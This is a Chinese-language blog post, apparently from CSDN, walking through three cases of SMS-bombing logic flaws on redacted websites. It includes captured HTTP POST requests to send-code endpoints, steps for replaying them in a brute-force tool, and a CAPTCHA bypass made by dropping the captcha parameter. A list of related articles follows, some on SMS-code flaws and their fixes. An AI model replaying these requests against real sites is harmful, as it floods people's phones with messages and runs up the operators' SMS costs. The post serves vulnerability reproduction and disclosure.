短信逻辑漏洞

最新推荐文章于 2023-08-18 10:48:08 发布
最新推荐文章于 2023-08-18 10:48:08 发布
阅读量1.1k 收藏 7
点赞数 3
分类专栏: 实战漏洞复现 文章标签: 短信逻辑漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617034/article/details/120098590
版权

文章目录


注:文章相关法规要求,有些词汇不能显示,经修改后重新发布,真实为短信hz漏洞

示例1

在这里插入图片描述
在这里插入图片描述
发送到爆破模块,修改POST请求内容
在这里插入图片描述

POST /registerform HTTP/1.1
Host: www.xxx.com.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://www.xxx.com.cn/
Content-Length: 234
Cookie: JSESSIONID=Oi3MkNsPbGbN_DVulKs755X7.win-o64vuqqq6d9
DNT: 1
Connection: close

busiNo=system.sendCodeBo&param={"message":"1xxxxxxxxxx","type":3}

这里发送20条数据,正好这里短信发送的上限也是20条
在这里插入图片描述
注:关于POST请求内容修改

busiNo=system.ZhuceBo&param=%7B%22namee%22%3A%22参数%22%2C%22pwd%22%3A%22参数%22%2C%22tzztype%22%3A%221%22%2C%22tel%22%3A%22手参数%22%2C%22email%22%3A%22参数%22%2C%22code%22%3A%222222%22%7D

到

busiNo=system.sendCodeBo&param={"message":"1xxxxxxxxxx","type":3}

上面的内容是根据网页源码进行修改
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
注:政策原因,这里就不放收到的短信信息

示例2

在这里插入图片描述
这里请求包什么都不用修改,直接爆破即可
注:政策原因,这里就不放收到的短信信息

示例3

在这里插入图片描述
在这里插入图片描述

注:如果不修改POST传参种的120,就会失败,下图是未修改且攻击失败的返回包
在这里插入图片描述

更新:这里遇到个比较有趣的,此处漏洞修复后,设置了登陆界面发送短信验证码的功能点和设置短信发送次数限制,可是对他进行复测时,这个新加的功能点也变成了漏洞,即验证码绕过,爆破时如果你图片验证码不正确会提示图片验证码不正确,但如果你删了这个请求的参数,依然可以爆破,这…直接上图吧
使用验证码爆破

POST /query/service.yachtar HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://xxx.com/query/jumpView.yachtar?menu=validate4apply
Content-Length: 113
Cookie: JSESSIONID=EF87135A9B0697BBA5B80DB8FD1C45AD
DNT: 1
Connection: close

{"pram":{"receiver":"手机号","tel":"手机号","seconds":0,"checkid":"ewmd"},"request_type":7,"data":null}

在这里插入图片描述

在这里插入图片描述
图片验证码绕过爆破

POST /query/service.yachtar HTTP/1.1
Host: xxx.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://xxx.com/query/jumpView.yachtar?menu=validate4apply
Content-Length: 96
Cookie: JSESSIONID=9DD1307CA8A0C1831496F1CB64005C8A
DNT: 1
Connection: close

{"pram":{"receiver":"手机号","tel":"手机号","seconds":0},"request_type":7,"data":null}

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
注:政策原因,这里就不放收到的短信信息

1stPeak
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
短信验证码逻辑漏洞学习——各种绕过姿势技巧
记录并分享学习安全的知识点..
04-04 1428
短信验证码逻辑漏洞学习——各种绕过姿势技巧
逻辑漏洞挖掘文档有截图
07-02
3. 重置密码:在重置密码时,存在多种逻辑漏洞,比如利用session 覆盖重置密码、短信验证码直接在返回的数据包中等。 4. 竞争条件:竞争条件常见于多种攻击场景中,比如前面介绍的文件上传漏。还有个常见场景就是...
逻辑漏洞短信轰炸
多喝i热水的博客
07-27 5723
1.介绍 攻击者通过网站页面中所提供的发送短信验证码的功能处,通过对其发送数据包的获取后,进行重放,如果服务器短信平台未做校验的情况时,系统会一直去发送短信,这样就造成了短信轰炸的漏洞。2.测试方法 (1)手工找到有关网站注册页面,认证页面,是否具有短信发送页面,如果有,则进行下一步。 (2)通过利用burp或者其它抓包截断工具,抓取发送验证码的数据包,并且进行重放攻击,查看手机是否在短时间内连续收到10条以上短信,如果收到大量短信,则说明存在该漏洞。3.加固建议 (1)合理配置后台短信服务器的功能,对于
【web安全】——逻辑漏洞短信限制漏洞
Demo不是emo的博客
11-23 7064
短信限制漏洞怎么来的?一文带你了解短信限制漏洞
漏洞挖掘思路短信验证码相关的逻辑漏洞
最新发布
yuan_boss的博客
08-18 2500
​ 在漏洞挖掘中,我们经常遇到具有验证码功能的网站,例如登录,注册,找回密码,领取优惠券,修改信息等地方,几乎都有用到获取验证码,验证码一般都是4位的或者6位的,以下一些技巧很多都是针对增加提交企业SRC漏洞审核成功率的。1、验证码爆破2、验证码回显3、验证码与手机未绑定认证关系4、修改返回包绕过验证码5、验证码转发6、任意验证码登录7、验证码为空登录8、固定验证码登录9、验证码轰炸​ 通过以上短信验证证明逻辑漏洞的详解,相信读者们能充分意识到信息收集的重要性。
短信验证码安全常见逻辑漏洞
热门推荐
12306小哥
03-07 2万+
短信验证码安全常见逻辑漏洞声明:此文转自http://www.lx598.com/hangyedongtai/978.html (短信验证码安全常见漏洞)       短信验证码常被用于网站用户注册、账户安全登录以及忘记密码、确认下单等应用场景,特别是一些涉及到用户个人敏感行为时候,为了确认操作是用户本人执行的通常会使用短信验证码进行二次认证。      在实际应用中,有很多产品的短信验证码接口存...
DBshop短信插件
12-19
5. 安全性:保持插件及时更新,以防已知的安全漏洞。同时,确保服务器的安全,防止敏感信息泄露。 6. 用户体验:合理设置短信发送规则,避免过度打扰用户,同时确保在关键时刻如交易确认、密码重置时能够及时发送...
AliYun短信SDK .Net3.5
08-25
阿里云短信SDK是为企业和个人开发者提供的一种高效、稳定、...在实际项目中,还需要根据业务需求对发送逻辑进行优化,例如添加重试机制、错误提示等。同时,注意定期检查SDK更新,以获取最新的功能和修复的安全漏洞。
C#短信管理
11-08
2. 短信逻辑处理:这部分负责与短信服务提供商的API进行交互,包括构造请求、发送请求和解析响应。 3. 错误处理:为了提供良好的用户体验,程序需要处理可能出现的错误,如网络故障、API调用失败等,并向用户显示...
c++短信查分系统
11-30
上线后,还需要定期维护,更新数据库结构,修复漏洞,优化性能。 通过学习和分析C++短信查分系统,开发者可以深入了解C++在实际项目中的应用,以及如何与数据库、网络服务进行交互,同时也能掌握教育信息化领域的...
网站漏洞检测修复 短息轰炸漏洞检测与修补方案
网站安全专家
06-22 635
很多公司网站的被攻击,被篡改,都是存在着网站漏洞隐患的,也有很多客户找到我们SINE安全公司,对自己公司网站进行渗透测试服务,以及网站的安全检测,漏洞检测整体的安全服务,我们SINE安全在日常对客户网站进行安全渗透的同时,发现都存在着手机号任意发短信的漏洞,简单来讲就是短信轰炸漏洞。尤其一些商城网站,平台网站,会员注册类型的网站都会使用手机号注册,以及微信注册,邮箱地址注册,这样做,方便大部分的用...
web短信注册漏洞探索(成佩涛黑客)
07-06 2485
从 1、聚美优品(无防御) http://www.jumei.com/i/account/signup/#phoneform 2、网易注册(每天限定IP发送次数) http://reg.email.163.com/unireg/call.do?cmd=register.entrance 3、手机注册(发送手机短信前输入验证码) http://passport.s
常见逻辑漏洞
土拨鼠挖洞中的博客
10-06 7450
  支付逻辑漏洞 检测方法与案列 支付漏洞一般分为三类, 支付过程可直接修改数据包中的支付金额 开发人员为了方便,导致支付的关键数据,能直接截包查看而重要的金额数据,在后端没有做校验,传递过程中也没有做签名,导致可以随意篡改金额.     没有对购买数量进行负数限制 产生的原因是开发人员没有对购买的数量参数进行严格的限制,传输过程没有做签名,导致可随意修改,经典的修改方式就是...
逻辑漏洞】-第二篇-短信bomb漏洞
weixin_41560238的博客
03-06 557
短信轰炸
短信验证码漏洞多风险大安全锁该怎么加?
0729Liang
08-26 784
8月14日,深圳龙岗警方宣布打掉一个新型盗刷银行卡犯罪团伙,抓获10名嫌疑人,查缴伪基站等电子设备6套,带破同类案件50余宗,涉案金额逾百万元。据专家分析,嫌疑人通过“GSM劫持+短信嗅探”技术截获受害人短信验证码,从而完成盗刷等操作。截至目前,这是全国该类案件中打掉涉案人数最多、金额最大的一起。 “基于短信验证码实现身份验证的安全风险显著增加。”全国信息安全标准化技术委员会在《网络安全实践...
获取短信验证码接口爆破测试漏洞问题
weixin_45979191的博客
07-16 468
获取短信验证码接口爆破测试漏洞问题
漏洞解决方案-短信验证码
smart的博客
08-21 4808
漏洞解决方案-短信验证码漏洞解决方案-短信验证码防护方案 漏洞解决方案-短信验证码 防护方案 IP限定——根据自己的业务特点,设置每个IP每天的最大发送量(防止攻击者对服务器进行大量无效请求(在图片验证码未破解的情况下,自动化工具形成错误请求,增加服务器负担) 短信发送间隔设置——设置同一号码重复发送的时间间隔,一般设置为60-120秒(防止对单个用户形成手工攻击;防止图片验证码失效后对用户形成大量攻击。) 手机号码限定——根据业务特点,设置每个手机号码每天的最大发送量 流程限定——将手机短
获取短信验证码接口存在短信资源消耗漏洞
weixin_45979191的博客
07-16 416
获取短信验证码接口存在短信资源消耗漏洞
资源消耗漏洞+支付漏洞+抓包练习
Ms08067安全实验室
11-01 222
文章来源 | MS08067Web高级攻防第5期作业本文作者:a_xupeng888(Web高级攻防5期学员)资源消耗漏洞的定义资源消耗漏洞指的是部分功能点或部分接口在实现功能时需要请求资源,若该接口并没有进行对应的限制,则攻击者可以通过频繁的调用该接口而消耗服务器内部的资源,从而导致包括但不限于:服务器宕机、拒绝服务、资源被滥用、配合钓鱼等实现进一步的攻击。案例一:资源消耗漏洞练习访问靶场发现...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值